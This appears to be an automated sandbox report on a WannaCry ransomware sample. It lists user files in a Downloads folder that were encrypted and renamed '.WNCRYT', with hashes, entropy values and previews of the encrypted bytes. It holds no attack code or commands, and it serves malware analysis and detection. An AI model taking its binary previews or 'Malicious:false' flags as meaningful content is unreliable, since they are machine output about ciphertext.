                                Preview:WANACRY!....V..}<.x.._....,......)~'.U. .[.4..:k...U..E...u..p.H...*.C......hF..3W.i....e....!"...._"r.......1..M.a..\:.y8h.J.~.1RPIW...6...2..>.....\...s4..x..6v_._4e}...%.....DO.84....9..r..l..u.6...#..mc....9.....LK..g.E.[@.N.<@FjJO..t.V.DF.X...M.C}../...............!.(H....3.."..e.EP!....ay.?C2.z.c.Dr.G.b.Op6.=q@{'.~y.....l...Y...qW.{..5..e..F..Q.Qh..w..+..:..j.s....@........*-.2rA..n7.._O"....i.{..HN&..U._b..T]M.].^.....pYO.....;.......bh.0X.\.....U.....B.Ay.(R.e...,y..*....(kT2...2.W.ZC*....R[da}.Ncwq.g..\...]..A.U@O.b....<.I..ZH.4..q.g.....$..B..:`#.e.O.u..p.K_[.O9Zd...F%.X..G...J...?.f..!C....r.]..^.S..*..\.nQ.......\.e..EfQ....]>R..i..h.I.5.E....d....Ze..s.........x...n..l..?..yW.3.p.O`]..(OO.%vZ....uk.a.:..T.on2.et4Z....2i"..^....mQYO.W1.Z.YhR.C.".5t...U`...)...A.Fc......#~..b.....5.CJ..G.85.....M.Ux.U..V.y....=.<..px...<...".bD.6uZI).$......; .}~(.#...Y;Pm..(4...2.....W^B*e.%]e.I.*...]..........E^_=..!..2B..=...FgiV.p..+......u.....P.

                                C:\Users\user\Downloads\GIGIYTFFYT.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83950670458498
                                Encrypted:false
                                SSDEEP:24:bkGbI2cT/8qqSGXzhPxpjwNwYcMJB99HT3MeFh2hot2CC0MIhU/EKBdLyd2B1:bkGtcZqj9wWMbXzD2CBPhUnb
                                MD5:9C0F18444270E237DFBFDD7742D5ACF7
                                SHA1:65A503E099AFDB13DDBA235F753EFF26D88CAC63
                                SHA-256:33A9662A676D232EAF819FDFE515ADFE4B3E3F0D58C8797751BAC9A9975E0B0C
                                SHA-512:F0E9BFCC69BC787599787146C4E2D00D469B60DDB4C4F700A10B5DAEFB273001485A1E73ECF99AC3F3BE49F448757E9456F206E119F97FDCD9F3F6A858D33E0B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..........i.X(.I...uKX...e...m.-..[V......9........@.U.]'.d.{..'h}.@.ET..G.....0_....`.x.m1.OG.J...T|...=.c..U.k...J......P...|..M.......;.~o.t.Z.B;.f._..|.&G..C....-.E4.0......r.}3L...(..1T..~.f.W.. r.F.e...8.L.^z.].....%,....y0.<a.I-.....m.&.v|.F./\E"............w}h$.6.pXShx..6..M....:....-1..}...~.L..KS...0tJE..uY.gY.j..^XQ.!..b.~K.{..F..G.."..!su.h..,$gZ1../.A..y.4....]...p.[a.....-W....B...y..l.[.^.xL`]S...=...'......w.r{.<.....nY.h|d...........S.a&.S.....4.."h...Q.@h.+......l../m..&?.lX.A.XK.F.R.../....^z.R..b....!.R. }....H.....3...)_zJ.ZL...n..`..v!._....#.Y...3(7t@.T0...O....:..L..*....p..v=$.&....,..b..P.I...^....&..@....L..2........TI4.J.p..Q.......i....I.%......`.O|.O.&D......K{./..h..6;H..zV.`....kV..|6....($l..BP..Af+8&.1m.L(/.S...-....Q...*. '..BL].G.Q>..p@......^.0.K].....^....mYS."..U.s..S...7y~G..\).......]...M.v...XH.)..{L.v...~.v...5......J.,..p<.a...-?.....1..w.O..,t......Lq..Q..DD7..8.&...8./e..$..}......I(.#

                                C:\Users\user\Downloads\GLTYDMDUST.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.860933346082135
                                Encrypted:false
                                SSDEEP:24:bk+tvNrzSweXA+ME5DCLgEsjRfMO0LfbLGHlPuhBuKBRuyLHre6mYmGJRB5tWAkk:bksv9zSwO1EoM1L4OBuW7LLiQv5Au7B/
                                MD5:0856BC7ED6ECBBE40A84B46972F59597
                                SHA1:5AB718283D2821759C55429D72BA0E3DD3BC1777
                                SHA-256:29D57D9C8812EF28FA767AC1D94D8E140658A2939E25BE4C354E038827EB36D9
                                SHA-512:30ACB614CD35250D80BBF7BCE2ADA96AB95A81F9DA90C3B90343899E631D65726C68111B0E207F4641E0562A82CE75C26EDE473CCF512D9BD09CE1128606E6BD
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....!........H.XH...zz...C8.+.J.^).^*.f.1..nr.Z....J.8.d..".T.W.%...y.<.".9..)..E...3..y.\".Z^G.&..%....+.;K.j.....T...v..@......[.N..b..zY.t..F.O.99.8..k..&y....hJ.i.2.... .Op4.`.......P.ld0..-.H|.....T...9.....!.x...<I.@.I...m...O.....d.Am..B...M......................~..X.:u...:......$...a...|J..Zl.."..@).r*J...{...R!.8...."...f}U?.+8.....p>.i..[.R...7..c!.2;...I.?...M..o<(g.w...]{:T./.M...](nk.v.i..:...5..u4.......t.ZKRre..r..>.3;.6..RZ....J....q...$.~......oI.jMZ.Q...S...W.N.|I.O.&...r...b\..EA.n}.|..H...;..q....\.]..2..K.(M..)/.7..p.?..1..P.3@/.o...`.....g..S....GT.\....5....~.i....aK.o....;..G.~..:4.yT......8/...HR.vH.......j.......=..j.Q...g..8(....Q..,+b=M...=.I..2:`.)....2[D1Z...+.vpe..3..i.Hd.18F....Ej."..J97*..e.....U..i..u.(.......5*...c7.....]..V.D.u&./.q#3a....m....`t.3...........vL.#..7m..5.}.....j....=.V.hY.q..k..B-.V.N.R0...D.r~.7.(.gq....XE|w>.. ......>....%.r....(`+.......lV+,../e......kK.7S$..L....{..8.8"eq.

                                C:\Users\user\Downloads\JDDHMPCDUJ.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84952384993601
                                Encrypted:false
                                SSDEEP:24:bkwm9geGW+kv9kVmm1Nnx6VtNAZKxN8o1FXSWijdf42rA5tx57OCYnOlyESru:bkwG9OkFkcmrM/xN8QCFjdfJrArxlO3G
                                MD5:280DB99EABDC9E2532AE94E642FC0684
                                SHA1:65041E5B2A9245968C6118B8B54604F0129A3B9E
                                SHA-256:7FB1ADD67BFC5353C101AFE9D561C0E39776E52002B45C5785F9A60DC1FCE9E8
                                SHA-512:CD487830C641BC82C311B3D37D02DECBE424ED7C5C29869CE8A214725072E5387FBD2D0755AC5ECBF7447EE788A100C4A496AAA1BA0BE0F419E61D59365D067A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........i....N..|.Xu.........0.E>.....o._..c.7.$*.=.R.qf.Uw%.K.(..n....#....T(@.W...[......!y9'.].J..p.J.|....-,v.~....j..Q..P.kH..t.rk......-.\.w:....m........o.B.w...6't...~yI.#3..%Na..^o...O.%...,..E..3...urS......C.........W..~"...A..w............7)$].5\F.k."@.t]/.m+?./9Oh..}S.R.}1..3~.d&..s4.(t7.x.Xn..H|`.E.z.|UMR.&#g..U`..!...JK7~p.=.<..j..;....:........W#.k.:bn.......r..|...<q..il~.V@.t!J......F..qs.K.1.()X..>F...3.....m}.F....e..e-[%(."f.-...*..^......Qu,...0.A......{..[oF..Y.\.........-..?..V..Piv....!)..q..R.~6..Y.... .G.H..a+x.=..U.`v........+.,..N...M`4.9..m*.7F]....O..1..i.......Mi..../..Em.*L.vIA..i...,b..y.!.d.w.P....%.....R].+.vZ.v...'.h"y..I.!...w.$..].-#.g]..Cyf.i.v'/....Ta.U;.......jo...L...h........lv/#`..'Im.a.q..j..tP....zj.uH.. ....P/....l:............k*....Q..0{...`.].r..|...W.3..b.^`HL..O<..)..}...M^.......jF..bv*........X..}...!6...v..=....!...l~..bHo.......;_.'g.U....4G..>.hv.A.x.g..$Q.D.....O...ks.

                                C:\Users\user\Downloads\KLIZUSIQEN.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8753434673666565
                                Encrypted:false
                                SSDEEP:24:bkdV/Me2kgX6QxO9dR3gEroOrHesuovPUr1LE4GjccfryhoMuogC7TYSdTt:bkvD2kIytcObpu0gXGAu2h5ugkKt
                                MD5:96EFBE79C633FC2B995CA858CD4486C2
                                SHA1:C2BBEF63234AE3C890F38A1DC4A56CE71120E19C
                                SHA-256:CB4F4476D8679290FC9A39811570B6F5A2BB068A2C58FF5AEAC7DBD1C4C467F7
                                SHA-512:70AF35B3666A6D5787B93C903EAF3544CA3EDC2789DA9E5F755E6B806F7B7129CE458562495F1066A2CE81D70A0CB72A96526029A557F42D70BE8649BA625E9D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....`...x....a.D$.cP.a.....wZ.........r.9#.....A..V..#......f.u..._...........aO..M.;.}f.j...a.F..-.\.5S....B.o............>DgO~.M.pR]..r..k.2.c......Hb.:.&5|t._..5....H.f...m..P<.<-.q3.`..N..Q..s.a.><C........h...iL.T.W.w.<...q...j..."S`..W.I...............c.1:...N.I.._.....9.'"y....$\...:.&:....\.....B^.2.U:~r.x...v....4..6..J.U......Z(.e..aGI..... j.....+D...#D......o}..'~.M...sW...".l...`H.l..D.U.).......1Sx..A..5. 1&....9n....Z..kB....%..}.. w..y..@..0..|x.T ......E.>N..s....\"G.Ar...JO.E=..3%].e..u........f-[........q.........g,V.Q..].....v[g.T...9.p.Z..h.P...oB..|.}..a...Ej...R..v.a....f.@.)>5.`X5|.).W..{|6..t.>Q.b?..9..`a..%...(..v...^.....7.....x.$H..?..u......y..}.$......<...-..q.s...D....0+.._3.g......[.=...1.<..).$........../%..N....<dn..rzTW.RH5.-..H...@a.N.....[...+:w9DL..w'..@d..*/QJtTq\...P......h.#u..~w...$p...8.=!.+f... .\9..*#..x$.t...w...85.o^m..L..g>.*f!q&..C...w.<...+DK..1.V...>o.....t...,k.u..m...

                                C:\Users\user\Downloads\NVWZAPQSQL.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8496831722921225
                                Encrypted:false
                                SSDEEP:24:bkSCaw6d8FyvbIslx+DsqPWEQSWNLnpaTkmANboenVd8CvHn8XFTo3jQ3BLn:bkHm8LsL+hP5sLnpmkmANqCvHn8XujUL
                                MD5:5A65583D3932721876BC8889D97769B6
                                SHA1:ACE5A0AAB5A94DDDAB7C5EDE55660D71661CA0DF
                                SHA-256:029DC98383A60FEA0760CE4870A702F934AAEFAD8D281ADAF18A967CC72C58CC
                                SHA-512:C1B212FF9E3E7EBB8379F36618CEB67ED72D087F1815C6D145A2444989CB6122A58C8CF573C002D306BA10465B73B87B33BD8A9F223D97CD9A8B218BEB9750D3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......mVs...:mV<*.UH^.h..FfL`sv...Efl...."w.....Y... .d.s..d....~..q.h.......p........J&....._.I.....f#Y....V./.j.........*x..n...3K...t.t@mu&.....I..O.....A5....=.1.....6c...,..j.Z..7O.9.|..U].0..W.t..../...`zz.e...0..3..o....K...l..E?Z.3$|..d..Ni}KJ............W;t.B..F..>..h...4(.w.'.......%..O.b.r.c..(.......KO..:M&Ch.X$9H*.\..1...3<`.P.5A1...T..:W$.l<.E.....:.)-..d....>.y.C-.g..@..l1...@\T....S...he...]OU.-K...E...!....M..HYge.1.b_..j.j.-...>.:_.9k..<.j........U...6....~.?..I.#.K.`../Du#..%.}...vd..vx.]1$c.A..I.....!..i....9geU.%A.x.U.P|......../......d.x..JX..J(`!n78........H#.KH....+?...B.}...}...I....._.t-..;...........SN@6(H.;)x%z...q.1.Du.....5k@.1.h...:.<.>a...t....|..W..c.f..G...}..F.`..K..S&@...s....@\..|X.g$&...y..h.q..]..\.%{A.I..?..1...s..F?.&../.....Cd"..%.e&.v.}a.1...,...O.p..S..o..z.4.......X.qRN....dk.b.].3.I..._*........m.Lv...F.bi_J.7W....l.m....e.....c.f.)..B.....E....P..M..%.B2..0H._.'./<....-.r.M;.C.)...

                                C:\Users\user\Downloads\NYMMPCEIMA.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.851812909912617
                                Encrypted:false
                                SSDEEP:24:bk7wxPhDa5B4f8vQNjsm+qcNzr3lUfskRaEn2s7XtGlUL9qfIo311E40HWEUn:bkCO7A1sm+qcNzrVUfPn5IOoFY4gWEUn
                                MD5:F3E9DAB2A90C35C3F2EB4E5924577D9D
                                SHA1:AEFCBDA25D4444D46E8B90F7EFFFC3B0749BF9D4
                                SHA-256:3FC884503E0B9D68599F029CE0FFF222B97E8A587204D432F76DF0529505D606
                                SHA-512:2DF6173AAD1D4583C351F03CB14AC6FED8BB2E55419FF50EBF21B5FFCF0EFBF23EC90475E0A52BF732C1D8B1692C35816A200AFBD43A9FB2BA0CEF883D003570
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....0#.h..ss.lW...R.@Qj....h.{PL.Z....z.l.t^`. ......{.....+.p....`<........TK.M.....%.9....`*A... .h.........=...)i]b..ZV.$..#...=...n..........A.r...iZ..{.X0..%....`.......#.~.:.nz.....z+c>y.Yl.....k..........".C6.c6Tk.....VX.:.T..8.....N................. a.7..s/,...q.#.....P.....?.9..8>...A.L..U..L.e.Q.F$......7.."+.4<...e..)..L.\..q..5...KM.--.\.".-.....I.2._..q}=..TW.I........DQ....H..@....d."v_{.....Y...2Tty.)........z.....0/M..F.M......gt..(.B.8.'....zf.guLN....~@....;...Jv.?..."..aA.m.x.....G.T.=..Mb...g.Q.:<`..?.h(..Q...1..n`...+...}x.1:.....w>.X........V.?......-.........|d..20">^sY.%..u..`P3...T..Z9Ma5.ZQ{...rK .2....B.......K.;.a..{.].[.p.d.l..w-Gm.@.....l.b.....=3.{J.q..F..C...P7....E\.V.4............E..p...e..j.'...t#......>..r+..]i..4..9.S.......D....>.M..h.LO....m.N....:,=,.'....n-/..........-t.7.\..a....h....C.'$>...!.X..b....Ve**H|..'G....N ...L..|Ft..F.s....BI..<z'_..o.F...e..<';.q@...F%.,^.C.5.V.^c..B..q(P.S?

                                C:\Users\user\Downloads\PALRGUCVEH.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838728057263532
                                Encrypted:false
                                SSDEEP:24:bkxBnLt8TWY+F+WqQpeRT7/ISTZNPVOHDTvbN4Gm43BTAp++hYqFu2RRD0s:bkxBnL6TWYo+ApeRwSOmuqp+sVRBl
                                MD5:821C3F64C2F1FC4412D4F82B5549D4C2
                                SHA1:1BCA29F8840003C2F29D5EE3D9B4B071C7D235DE
                                SHA-256:BA14DFFF6AFB1618A3E686E07C6F43626FAECE4792F69DB6E58F8BDCD747ECA9
                                SHA-512:3211E09D07CBFFE69D6E0AF40429579C09741FD2927E3DEA95A5E2FBAEC96AD11E1854903EC854949E254335A4978A9CBA4DB59BB97C242CA23F89CB0A6377D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X..J...X.#.`nU.RRP&.W..no.............r.MO.E".(E.c.i.V.8.1..".y.yAL...\..'pm.....]. ..E..6sd4w.l..^.x...^..^.u&...a,.5.....-.d.......m.`...Y$.....q.lq..%.\j.....|...H.....o..!.J..5..pd._5...{il`\.$r.$|.WJ.3..6......}{.......E.....BD>......0$D}............dN.!.....k34.?.*..F..........EH.h../.}.$....+......i2lk1..K.Ew.E.......r.i..}..Tn..Js...@0{...y.o.n..N{..+y8....C..>...K7...+mh[.D..z..$p...mmD.vy.nU.....?..$.........Z.%I..1..u:..Xw..g....8,.....k=D.DD..x....1../.).3\.w.sc...p',."#.%&..!v.....K9......z...E.En.VI..X..BK.....G+......d..4..... ....4.}..&....U^.c..r.J.../U.].}f$.$.q...T.vC.t.oO.(.w...0....[.....E.N,..p....oDD5*..Sq..r.....DSg.Q~ ..l..FOy....tH....E.. ....|....y..[,w........................3.. ...}._.........4..2}.............L.X...".K......o.....+NI~k.|E.+B?M..H.(..KZ...P..p.g"..u<.?.8...o..,........s.R1...:>......N..)W.c2.xc.k&a....q.O..a"[.H......U....~...$f.....S.G....r..K..66d.i_..6.......GG.yR.....aS...%....4...`.P&

                                C:\Users\user\Downloads\PIVFAGEAAV.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8373031912395845
                                Encrypted:false
                                SSDEEP:24:bk9IqATLZdmCRj4DEBW84sUiqVz8Ol2TORWUTNCyiwvkjrN88KXYQ:bk9IqA3uk4DO4sUiqVIOUpUBCLwvkjBm
                                MD5:8DBB61629DA0D5B28E0603A58A1D5F83
                                SHA1:686354635CCF69C231D65305388F8A28157DB3BC
                                SHA-256:AAEBD1DFDFABB4FE5BFF02B60646227D6EBF3FA03E98A524FEE882EC2FA04D06
                                SHA-512:298601FF15312EB036BED0840A001228AB845CF912860828800C98692020168E447621B9D663159DBF6EE0A505F23BB1F653A6B0BB1C54AB3DE64F6E5D1FA4FB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....s.g.j:...9L...~(.M.a...3......~t.S$..#?B. ~...^%.S......S..Ka........n.U.r..&.$7...........pM../...E..X..U.dn*!k...3AS..?......&....._.6..........7.^..nAxL".8N.......'.2..}]......@........%.'.M....{m..../.HPm.O..!.....E`..{....RJ.(.Es.E...Y$(...................pu..>...eh...rQ...*......qN..pk,..iu...Lb....81y..A.@......2.v..d...~..N.v.E..<.<`..m.b.f.Kl.sky..+.X..o..M.=.OAz.}i....I.\...Z..CH'I/.L..+.^l....p..w..s.9X..oJ2.g5.'>.2..HEH.7..D.<....:.&&.d5c...8.._.._w.L...{.........Q.".{.w.-.~...U..p...".....+J....@...A...qv.6....Q.....b.w.N....PN......p.....a...n..>.a7.N.R..w..u.r...w..f.a... ...."h.C.?i=B..n...)a.mI..(O..o...qS(.R.A.....E..h..:..$..X...TjT.......H.dAG...@..C.p...j..g.$.r .TP3.Ty........uN#SsE/~.[,X.ku...Q..G ..$!...<.lE....t.=\..ra..H.....<V....s....n..M..h.....!%.D.XH.9.....p..l*.XX..7D.6...Z..f.c..b.X.m.VD4.rre.F6.a"Q6sn.W.......%.t..\...&ltv.p...v.YB.g.NW...........m8............2.51...F....MW.....9.6.b..V.....

                                C:\Users\user\Downloads\SQSJKEBWDT.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843132259331841
                                Encrypted:false
                                SSDEEP:24:bkuprhblkZWpojcPGB2imvWaO5j07ELdvE1iXBe2Cb8ozzqCF4KObZT+mas:bkQlk/jcPGB2DwjEEh0iPCo8zq6Oxas
                                MD5:3E6B211932196947D58C218A1023D457
                                SHA1:2531319188425695109EC3C908EBE8C275A1B78A
                                SHA-256:6E768F0C94FFBAE75519DB6FE5748D5BBD4FEFC7FDDA36A9FD33E2AD04D31EEE
                                SHA-512:3006DA3378D7DE62CB04959FC0CDF0D12C7F309A9EC482EE163F6131BE83D990170B9DCAA12BEF8659506658472B85A5BDEB746DE2FB9E4A17CDE6502426831C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....^..v..#.-..X...b..Ac....8;728*."...R*..K^....U.f...K..b.K.j.3....\N.|........7.K....?..C.X.vU_$YeV].....l.*.....I./.\.n.....k>c.[9'.j..y..N@E.....T....../.K...)1.B+a..P.gnn.l.,....l.|IG..........Q.>..B>...)..3M.G.u.)...u.3......0B.0...J..F.................A..._{&.......#_T..J.E.......3Q...N.].T.@qU.XCj..*]QH.....pI....5.~..v.q.....V.a......z.(.i...'V.s.]ci..Z..4L.......I.."U.I.....A.".I...gy.#..=..k....m.w.?..T......_.D&.............a[.6.......47....-.{I.%._6....a.T1...1..f.A4..c.DS.......$.g~RKC....g.B..x....ME.UW...N.4a.7.2..7)X......$".|4|........Y`J#.Z.......Q..Y.~v..P.).|).c...q......\..N..y..fv.@..y.Hw.#`$!2|@..o.N......Sa...,.r.[..f#.6..6'.n...m...K...h.`K..Z..}....9.......|..pC.9T.qDN...(.~..........[T.._.+.2.z.%.n..Bw....9.. .P..SP...........x..n=>.R...u\V.g....P....P.6.*.0.........Nz..#V.:z.|.r=?f8?.....f..........I.P..p...Aj.W..I.*....#....{+.....w_.P.........T[_.J...O.n.,..OX.H3...N~)T..j....~.Xg...oYB...x..

                                C:\Users\user\Downloads\SQSJKEBWDT.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854865218310198
                                Encrypted:false
                                SSDEEP:24:bku4wO30EvIoHeLiuJdnvvCPns8Nq/NtLBebN+MwLut5IXCUPr4STkzQKokeW:bku4wBE9H+9nSENy3wLO5IF4SozQGx
                                MD5:FC57EAAB47FB58C71CAD1622AB9ACD34
                                SHA1:E6F418406500D2F582C0C38F020F6A8727CF3C2E
                                SHA-256:83B5D6197DA614D6CEC781CE31D21F082B9A9411F97B1A4936F924EAD0412211
                                SHA-512:B2CF7E6ABC014FEE9E7778779BE6CDE014EAF0CBF3846FEF524546A77EDD482BD9BDFDC766DA3F6A37CD742775818441B86FCAE83861728F7F387300BC2B6FB8
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....V`.....D..O.z..]..}.-.."..".k..x.{6...E>.....z.Q1..,.L-.Sk.l.1G.......'...W.&|Uo...c<M.I...g..g9u...Kskd...Y.......6[.R..,g.I...lth*...\.]R..B.....~."].....K.l../.......!.....C....V.......l..JQ.Lc..4...R...W.%......b...E.....8.`.-..vm7Q.................,..E...S~nTU.*.o}2b...O...;b.0...k.~.....54=....g...,.D...+.>..z.?M..(.n..T.%..d+.Q'N$..B.6.w..]K....<.d.._.JE.A=.w..E...........pz.,....9.F&..f.....M.!tN.k.M..Z..q.....w..Li.O...S.W....*$=0+[.....6..+r.'...F...-...-dMb..).$ek.x.I..=..Bc....uM....p[X..R.._k..Z..7.".|..@.DXUk.0...dI..&.....Y.h..J|.~.-................(.....^?`O.*Y?.qr.F..r...y)S...[....@..=r..M}.....w%P{..o...P.;...~.H........+.0).@..OI_.Y#...`....H..o..X<r.2;..Lm.a.pR....F.B.1.S.a.6q.F.@.....*...=s)7....p ...^.L../.......\..Y..R..2X.%..I.....zX.D0]eJ.].....;..[..\..r.co...=...A.v...6..Q-...bJM.'..0.{q.t_9p.>!...b0C5.z"G.7g.L....VG... UK...XUa./.~K.....tF...t?........a.sUq.{$.&.-L........E~].1.p:o.C. |.!a?.!qeH..2....

                                C:\Users\user\Downloads\ZGGKNSUKOP.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834722866247955
                                Encrypted:false
                                SSDEEP:24:bk16CokuxWVsd4cc4A+U0E2ZfKtc8Iw3zZTiX4vIWnmkAY2+aNxHRFM:bk16Cokg0sU4Ah0ZfyVIw3Ja4vIWmk35
                                MD5:993CA612354F87F8B531F568F1349C30
                                SHA1:2B1C70A80BC0C9222454EF1CA292E985A7212F7F
                                SHA-256:29438FCB5DB37F3148A6AA1190C808E93B20524B13115F142CC8A9EE8C91F83F
                                SHA-512:CA7246E6A670D8A0FF8C8A56D1DB5B566D560BB62C775A4465F266782C359F8323DEC7D7E1C382BF0B0931B0CC5F30139ED71D7E268A41345EE5A441E2B3D1E7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....0....jE%.7%..).CU....t..N.aF....E./..m.R..n..I..#..k...t....j<..eG......Io..mW.............9.~'...I.....+.Cc.....D..S.p.....c ..Mot.&"N.....;.y.V..DSjm."..M.......8.x.....c.l..`..c.wnN.e......Fv..KT..r...i@.c..c..B ..).M....|....khF...C......in..............:....+.0c.N...NK..kg$."T..#..H.O.Jb.y3....i6cZ.k.^.~R.%...w.o..*.|=$.U......Y...l......E..W.j9...7...a@... `.2?`..(..p....w(.-Ft.%...;..6../....r........c .A.m3.k.....K..$...EX..s1...W..1.V..K.S\5W.J8..lS.......Gf..|.....<i.m..?.}E...HO..v..{.}..l....'.lT....mM....f....u...#!l.Z.E.m.....--......'X. y7.N.;.......{V........}.&%..T.....=._qk.....k.i....s-......-..n..'....H.......[.v..F...J-.c[.f[...t.......m.4.:W6}.Y..!-F..).1x.n$.8... N..7..+s...AckL5<....^.1.0..+.#.....x.....h;..}.h.PZ.f.UEF.G.&D..k...y_A>{.EjI3O.H......|.D+%g.lQn;.2O...........A..2}"\..-.....+=]...=}...,7..~..M..... .L............ ..P.lu@;$=z!...[]pj.......Y..fRF..Z.~#...a.+OW....>v..r...HB.....v

                                C:\Users\user\Downloads\ZGGKNSUKOP.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.812229501434341
                                Encrypted:false
                                SSDEEP:24:bkRxYAZzF5wg2sTw67rr3Oi9N5+yBbgeKxjuFNbqDmv0PjgmzL/Pe:bkR/ZzoGw6fJ5HBgx4Yne
                                MD5:BD201C4E7FD57F7AC4E858029864E443
                                SHA1:3F8BAF28E87F07C255774F8750D6A8148D2226D6
                                SHA-256:6987E0B2020ABAA267FE5077A466C65B36C0DF6A8172047BE00647DBFB7A5ED3
                                SHA-512:601DBC400847E7D37F14D551C669C65397FEF70898693D30F56F17BC8D5747604445C44A798441ACCD6E60D32D242F26219FE43A286AE7AC9E1E23357B70B8D5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....[>......&9"T...H.{..w.....M.?Y...@9cQ......[....i..p(,....(h.0.sf....p...qK..\...(E)........s4.Lf.e...fD.vD...w..m}..qji.W.,..>.M'}.,.?i#..._..H.......YC...D...`..H8..C.......SP....6.......k.~.~..[.m..p<...9QZ..P.............`....n.C....1..............Ne"...M).b#._u...Q.... .2w......m.D<6..9...7f.+).@Q...@.Z .6^i....i.7..ygb........n..C.wK....,.XN.D[......(..#.....E...2.J.2{..m.o.q...Lx..j.!...5#.......'...,..X.......N.YwVFA.....]u.....u.h.5.&.ZV......?[.I.|.q...P.\.@kM....w..&...Xh|....F4........<..Z...M.b.}a*,.cT...y...R.*w4...3....c.\s.....!.)..%zL|J.#............hY.t...Z,.{Q.\$.9.N./.5Z0>..W.....\.....MQ.z....z..>..e.0ex.+...B.2.:.+..**...3U^.M`..2..j...)......}.....7G.....'...z.H$.....wK..H...X>.....H.n.4...i|z}P.............")...Mi.?G...[.......<./..t~e.Y8i./....).....)B.u.{.'.:....xS...g9G..c...0...?M.F..!...;.....{.......<...h.R.V...I(-%.9.|.^..&0>...>.....=YV`SigO..HyL./.u.....^...).#.5o`".+...=#....zW.f......

                                C:\Users\user\Downloads\ZGGKNSUKOP.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840221560663818
                                Encrypted:false
                                SSDEEP:24:bkq9WKVrpT1OIvhRZjXKwfSBG3uOWPXEvGnI1DhcNOXYRmG3ICEv/rsec3gn:bkWNVRDDfk+5WPUuneVaOaICGrth
                                MD5:793749CC06DFD3BA53BBFB204C7D4A73
                                SHA1:16D8ECF4F6B21BD6E1700F129829C1F8AC9D8BE9
                                SHA-256:5A6C7783B4AFCC41611A19D9A6CB323ED7403FC7811541CD10A14C7C7DE97E4C
                                SHA-512:8F5EB902300414F446D2921D09BA4131C64E7BEBC2871BB46DE52315D451B8803AD6F4D1377EB3B1BE480EB48CF4BD240D70DCC3F8E566EC2DDE1E0D0298C04C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......L..P.1~J.+.......o.5.+...R..|..I$Uq....hJ.E.`g..{..(.}0..6.4...v.|..Qj...c=9.......3U..Ga.cE.8...W..dS.!.)..W...S.'..:..?..L..D.....#S[.$..!.....p.......c.9...ro...,.^....D........<0e...a.....I..7.Q....*..,..bs8...=..*"Z.};'A...j..5Q.>...................d9..."M...NC7...^.!.y..A..MBH0..#0.....Dc.....O;I.Xu.........../P.|/.e...;....{..S.............i.?c.2..kr.]...'(.7...........=.a..xZYT.....).FYR6..J.Y....e...+..j Q.9..V....#^O..z..os.0..;..NG.j....V.|.,...........j.3..>.[.....k9>.Y..W...5...@.J..._...g..vs..Q.3.!..p.Og..v.p...h...Q....f...@J....&X.......%=..@5.7r.1P.3./....1.|P[.............<... ..>.}*...!..u...3..D.j.&.B.Z..JegT.X..^i.c.4qd.wq.X...p....rk.Q..^....+..D.BW.DI..0..eB(..43..@./_...E.....Wt..H1.^.....{..~7..0.d..|..<.......q....D^3Ra@s.g...l.(?.d8.V..S.8;.k".'.+......W5....P.........eF.Z2..:A.mBt.0.,.{L'.Yr.D....m ..xH...Q..g.?.....Q.....r.N.....g.s?..A.[L..&.. .;"#x.@..`2z./}.'|.jrJ.Q#.?..*os..x..m.*..K...C

                                C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196552779536724.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
